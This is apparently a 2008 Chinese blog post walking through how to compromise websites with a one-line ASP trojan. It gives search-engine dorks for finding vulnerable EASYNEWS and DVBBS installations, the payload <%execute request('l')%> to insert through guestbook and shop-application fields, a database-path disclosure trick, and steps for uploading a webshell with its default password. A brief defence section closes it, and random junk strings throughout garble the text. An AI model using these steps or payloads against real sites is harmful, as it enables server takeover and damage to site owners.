一句话木马的使用

上一篇 / 下一篇  2008-05-06 08:25:25 / 个人分类:网络学习

实例一:“一句话木马”入侵“EASYNEWS新闻管理系统”
:w;bW4luHtB4821
)x+JhXKU V6I4821“EASYNEWS新闻管理系统 v1.01 正式版”是在企业网站中非常常见的一套整站模版,在该网站系统的留言本组件中就存在着数据过滤不严漏洞,如果网站是默认路径和默认文件名安装的话,入侵者可以利用该漏洞直接上传ASP木马程序控制整个网站服务器。 云南博客/f~sF `v3zw

2aa^~HI%sk4821Step1 搜索入侵目标 云南博客`1K Za,L"L

z"~1hjJiG#hb4821使用了“EASYNEWS新闻管理系统 v1.01 正式版”的网站,在网站页面的底部版权声明处,往往会有关键字符为“
www.****.COM 版权所有”。只要在GOOGLE或百度中以该字符串为关键词进行搜索,就可以找到大量的入侵目标。
[8s6Fd*Au r`x4821云南博客T x`[5l'W P f;A
Step2 检测入侵条件 云南博客NuM|2R }

cw6E6d i5\4821在这里,我们以网站“
http://www.****.com/news/index.htm”为例进行一次入侵检测。“EASYNEWS新闻管理系统”网站的留言本数据库文件默认是位于“\ebook\db\ebook.asp”,首先在浏览器地址栏中输入“http://www.****.com/news/ebook/db/ebook.asp”,回车后在浏览器页面中将显示访问留言本数据库文件的返回信息。如果在页面中显示乱码,则说明该网站的留言本数据库文件没有改名,可以进行入侵。
h\*@)L Bx!c*b4821
,j AJ5F3w I nqZj2n4821Step3 在数据库中插入ASP后门
Ws&INouO4821
@.q`&vv(u4821前面提到了该新闻系统的留言本插件存在过滤不严,因此我们可以通过提交发言,在数据库中插入“一句话木马”服务端代码:
Tyv9M4uta q4821云南博客XC_1Qx PQ:N
在浏览器中访问“
http://www.****.com/news/khly.htm”,打开提交留言页面。在提交页面中的“主页”栏中,直接填写“一句话木马”服务端代码,其它随便填写。确定后点击“发表留言”按钮,文章发表成功后,即可将“一句话木马”服务端代码插入到留言本数据库中了。 云南博客6w+D9g/{ M%B%~
云南博客%Ak&v EL9v}+{x*N
Step4 连接后门上传Webshell 云南博客I m%jm0B4`,JS
云南博客#F2th2U)}HH
由于留言本数据库文件“ebook.asp”是一个ASP文件,所以我们插入到数据库文件中的ASP语句将会被执行。将“一句话木马”客户端中的提交地址改为留言本数据库文件地址,然后用浏览器打开客户端,在上方的输入框中输入上传ASP木马的保存路径,在下面的输入框中可以粘贴入其它的ASP木马代码,这里选择的是桂林老兵网站管理助手ASP代码。点击提交按钮后,刚才粘贴的ASP木马将被写入到论坛服务器中保存。
;Q B,B8~ PSGf4821云南博客1SV1Xa s%z|
Step5 打开WEBSHELL
lX@"f*KqI+Aq-J[ t4821云南博客R k+N)]%N{_h-Z~K
上传的ASP木马被保存到与数据库文件同一WEB目录下,文件名为“temp.asp”,因此我们在IE浏览器中打开页面“
http://www.****.com/news/ebook/db/temp.asp”,输入默认的密码“gxgl.com”,就可以看到一个WEBSHELL了。
$p0l*xs2O vQ S-v4821
A-z7Q_6`{ T-|4821在Webshell中可以上传其它的文件或者安装木马后门、执行各种命令等,网站的服务器已经掌握在我们的手中,可以为所欲为了。
4Yc4Vj(w]4821云南博客l#l&fygoI:_:r
实例二 “社区超市”入侵动网论坛
6v9P4tAiM-S[5nV4821
h%~q\ZH\ y4821Step1 检测入侵条件 云南博客+R1MNY0I0c
云南博客`Dr)Q@ ].G
以入侵论坛“
http://www.****.com/”为例。首先在浏览器地址栏中输入“http://www.****.com/data/shop.asp”,回车后在浏览器页面中将显示访问"shop.asp"文件的返回信息。说明该论坛的社区超市数据库文件没有改名或删除,可以进行入侵。 云南博客Xvxc3xE/\TK
云南博客w#|7n zC,uP
Step2 在数据库中插入ASP后门 云南博客_ yS"q ueg
云南博客'SW [5hD `S
登录论坛后,点击页面中的“娱乐”→“社区超市”,打开社区超市页面。在该页面中选择商店申请,打开“商店申请入驻”页面“
http://www.****.com/z_shop_newshop.asp”,在页面中填写任意信息,注意在“商店招牌”栏中,添加刚才的ASP代码"〈%execute request("l")%〉"。确定后点击“申请”按钮进行提交,即可将ASP代码保存在数据库文件中了。 云南博客3zc9?E M9^w
云南博客&{ z6{r*{| TS
后面的步骤就与上面介绍的一样了,只需要用蓝屏木马连接数据库文件“
http://sdoygb.w2.****.net/data/shop.asp”,然后上传WEBSHELL就可以控制论坛服务器了。 云南博客A$]6c4{Tc
云南博客#DYV)H8s5_1]"H
实例三 “一句话木马”入侵未知网站 云南博客7~v R O"Q
云南博客T(B3^r)c1cP
从上面的两个例子,我们可以看出利用“一句话木马”入侵控制存在数据库过滤不严漏洞的网站,成功的前提是一定要知道网站的数据库地址。对于一些使用了未知网页程序的网站,我们如何才能找到它的数据库地址呢?这就要结合暴库或者跨站之类的方法了,下面只是结合一个简单的暴库,介绍一下利用一句话木马入侵未知网站的方法。 云南博客-c(Ei%cd i9_9rBZD

nK _`zC2m&d4821Step1 暴库得到数据库路径 云南博客#l7U%gh{!f8G$L

,X1R/~}9J z+v k4821以“
http://bbs.****.com”为例。在浏览器中打开“http://bbs.****.com/join/listall.asp?bid=2”,将地址栏中join后的/改为%5c,在提交后的返回返回信息中可以看到网站数据库地址:“’d:\wwwroot\shuilong\wwwroot\admin\adshuilonG!#).asp’”,数据库文件名中加入了“#”符号,“#”符号在IE中执行时被解释为中断符,要访问该数据库文件则必须将“#”号变为“23%”才可以。因此数据库文件的实际WEB地址为“http://bbs.****.com/join/admin/adshuilonG!%23).asp”
(x8[_NH$E4821云南博客 ?n&H~.w,J$^"F
Step2 注册网站,插入“一句话木马” 云南博客a(t{|Tf]8p?:q
云南博客X*pYL!zB.yFs-n
由于数据库文件是ASP文件格式的,满足入侵条件,因此现在我们需要将“一句话木马”插入到数据库文件中去。
2g^h@O4821云南博客;lZ6V:V`4_dL-o@
在网页上点击注册网站按钮,打开注册链接“
http://bbs.****.com/join/add.asp过滤了=step3&bid=3”,在资料填写页面处的站点名称或地址中写入“一句话木马”服务端代码,其它随便填写。然后点击完成按钮提交数据,木马服务端就被插入到数据库文件中了。 云南博客8NO#[`W1i3\E
云南博客 t*{e+Y*B5k(r!j]
最后只需要用蓝屏木马连接数据库文件“
http://bbs.****.com/join/admin/adshuilonG!%23).asp”,然后上传ASP木马就可以控制该网站的服务器了。
,x:~K0ye}!{"l]4821
K1K`6UE? k0j5CZ ]:E4821“一句话木马”的防范
?qj~KK? I;Dk4821
Q8q$S0u?5Z~r X&~4~4821要防范“一句话木马”可以从两方面进行,首先是要隐藏网站的数据库,不要让攻击者知道数据库文件的链接地址。这就需要管理员在网页程序中查被暴库漏洞,在数据库连接文件中加入容错代码等,具体的防暴库方法在这里就不作过多的讲解了。 云南博客?/x)K%\.q
云南博客^%_+m X(Y(f }
其次就是要防止用户提交的数据未过滤漏洞,对用户提交的数据进行过滤,替换一些危险的代码等。例如中国站长联盟网站在出现该漏洞后已经对网页程序进行的修补,插入的ASP代码中的〈、〉和"等字符会被网页程序转换成其它字符,致使服务端代码无法正常执行。 云南博客+d+Fl%x,z0|
云南博客2}p~k'r
只要作好这两方面的安全工作,“一句话木马”虽然无孔不入,但是面对这样的网站系统也是无可奈何的了。

TAG:

 

评分:0

我来说两句

显示全部

:loveliness: :handshake :victory: :funk: :time: :kiss: :call: :hug: :lol :'( :Q :L ;P :$ :P :o :@ :D :( :)

Open Toolbar